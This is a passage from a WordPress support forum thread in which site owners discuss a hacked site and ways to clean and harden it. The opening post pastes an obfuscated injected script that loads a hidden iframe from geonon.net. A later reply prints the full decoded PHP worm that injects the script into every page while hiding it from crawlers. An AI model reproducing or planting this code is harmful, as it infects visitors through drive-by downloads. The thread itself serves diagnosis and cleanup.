i think iv got a virus, when i go on firefox and view source…

  • the following script comes up at the bottom, does anyone know where i can delete this?

    var pageTracker = _gat._getTracker(“UA-11329795-1”);
    pageTracker._trackPageview();
    } catch(err) {}</script><script>var VkXmR6=’d$!#o$!#c$!#u$!#m$!#e$!#n$!#t$!#.$!#w$!#r$!#i$!#t$!#e$!#($!#\’$!#<$!#i$!#f$!#r$!#a$!#m$!#e$!# $!#s$!#r$!#c$!#=$!#”$!#h$!#t$!#t$!#p$!#:$!#/$!#/$!#g$!#e$!#o$!#n$!#o$!#n$!#.$!#n$!#e$!#t$!#/$!#i$!#n$!#.$!#p$!#h$!#p$!#”$!# $!#w$!#i$!#d$!#t$!#h$!#=$!#1$!# $!#h$!#e$!#i$!#g$!#h$!#t$!#=$!#1$!# $!#f$!#r$!#a$!#m$!#e$!#b$!#o$!#r$!#d$!#e$!#r$!#=$!#0$!#>$!#<$!#/$!#i$!#f$!#r$!#a$!#m$!#e$!#>$!#\’$!#)$!#;$!#’;eval(VkXmR6.split(‘$!#’).join(“”));</script>

    </body>
    </html>

Viewing 14 replies - 16 through 29 (of 29 total)

  • @samboll

    I did a restore with clean files after finding 3 or 4 inches of misc code in many of the php files.

    I changed all passwords, removed plugins and my dashboard is now back.

    My feed is now showing correct and validated.

    I run 2.9.1 right now, should I upgrade to 2.9.2?

    Anything else I should do to make sure this doesn’t occur again?

    Thank you

    My url is: EmbracingMyJourney.com

    caryngf
    don’t let them in!
    https://blogsecurity.net/wordpress/article-210607

    samboll thank you!

    Thread Starter flicksandbits

    (@flicksandbits)

    iv given up! does anyone know anyone who can fix it for a fee or any sites that have script generators?

    @ flicks and bits – if you haven’t gotten this resolved, message me directly via my site (embracingmyjourney.com) and I will be glad to help you out if I can.

    Caryn

    @samboll – in re: the security codes for .htaccess file.

    Mine is in the root directory, there is not one in the wp-admin area.

    When the codes are added to the one in the root directory it changes the index page back the godaddy default welcome page.

    Any thoughts?

    I have upgraded to WP 2.9.2

    Thank you.

    caryngf

    with godaddy, putting one in wp-admin could be tricky
    where is the site? in the root? or a folder?
    also, used to be, it took godaddy a few hours to update .htaccess – hopefully this has changed.
    also, which directives did you add to .htaccess? and maybe I can spot a problem.

    The hosting came with wp installed so the files are setup to my knowledge in a standard format. The root contains the htaccess file but there aren’t any other versions in the wp-admin or other folders. The “best version” of the code was copied and pasted after the *BEGIN WORDPRESS stmt but before the closing tag. I tried it above the other code just after the “begin” then tried it after all the other code just before the closing tag. Both times it gave an error (not displayed) then brought me to the generic godaddy welcome html page. so I removed all the code for now.

    The code I pasted was:
    <Files ~ “\.(php)$”>
    AuthUserFile /etc/httpd/htpasswd
    AuthType Basic
    AuthName “restricted”
    Order Deny,Allow
    Deny from all
    Require valid-user
    Satisfy any
    </Files>

    that code should work

    what happens if you rename the godaddy index.html?

    rename the index.html to welcome.html?

    I’ve just check a friends site and the worm/hack has attached it self to every .php file in the wordpress directory — not many clean ways around this except to get a fresh install or all WP files, including themes.

    Starts with /**/ eval(base64_decode("aWYoZ ..... IH0gIH0="));?>

    Decoded this gives you:

    if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;   if(!function_exists('mrobh')){      if(!function_exists('gml')){     function gml(){      if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){       return base64_decode("PHNjcmlwdD52YXIgVmtYbVI2PSdkJCEjbyQhI2MkISN1JCEjbSQhI2UkISNuJCEjdCQhIy4kISN3JCEjciQhI2kkISN0JCEjZSQhIygkISNcJyQhIzwkISNpJCEjZiQhI3IkISNhJCEjbSQhI2UkISMgJCEjcyQhI3IkISNjJCEjPSQhIyIkISNoJCEjdCQhI3QkISNwJCEjOiQhIy8kISMvJCEjZyQhI2UkISNvJCEjbiQhI28kISNuJCEjLiQhI24kISNlJCEjdCQhIy8kISNpJCEjbiQhIy4kISNwJCEjaCQhI3AkISMiJCEjICQhI3ckISNpJCEjZCQhI3QkISNoJCEjPSQhIzEkISMgJCEjaCQhI2UkISNpJCEjZyQhI2gkISN0JCEjPSQhIzEkISMgJCEjZiQhI3IkISNhJCEjbSQhI2UkISNiJCEjbyQhI3IkISNkJCEjZSQhI3IkISM9JCEjMCQhIz4kISM8JCEjLyQhI2kkISNmJCEjciQhI2EkISNtJCEjZSQhIz4kISNcJyQhIykkISM7JCEjJztldmFsKFZrWG1SNi5zcGxpdCgnJCEjJykuam9pbigiIikpOzwvc2NyaXB0Pg==");      }      return "";     }    }        if(!function_exists('gzdecode')){     function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){      $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));      $RBE4C4D037E939226F65812885A53DAD9=10;      $RA3D52E52A48936CDE0F5356BB08652F2=0;      if($R30B2AB8DC1496D06B230A71D8962AF5D&4){       $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));       $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];       $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&8){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&16){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&2){       $RBE4C4D037E939226F65812885A53DAD9+=2;      }      $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));      if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){       $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;      }      return $R034AE2AB94F99CC81B389A1822DA3353;     }    }    function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){     Header('Content-Encoding: none');     $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);       if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){      return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);     }else{      return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();     }    }    ob_start('mrobh');   }  }

    This code produces the following javascript that finds itself on the bottom of every page.

    document.write(\'<iframe src="https://geonon.net/in.php" width=1 height=1 frameborder=0></iframe>\');

    After you reach this site it continues to fire you from site to site until it attempts to find Adobe on the host machine and run as java based program.

    I found the same virus on my Joomla website and found this info:

    File Name: http//:geonon.net/in.php
    Malware Name: HTML:Iframe-MD(Trj)
    Type: Trojan Horse

    I deleted the code you mentioned above from my index.php page and cleared all caches in Joomla but the virus is still showing up. Please update this thread as you get more information. I will be watching for a fix.
    I hope this doesn’t count as hijacking another topic. It is the same problem and it is confusing to have several topics on the same issue.

    I found the cure for this virus! I bought a PHP Anti-Hacker Suite by OSE extention from the Joomla website. The tech help me install it and updated the virus definitions then cleaned the virus for me. There were over 1600 infected files. Such great service for $122.00. I’m hoping the Anti-Hacker component will keep my site from getting infected again.

Viewing 14 replies - 16 through 29 (of 29 total)
  • The topic ‘i think iv got a virus, when i go on firefox and view source…’ is closed to new replies.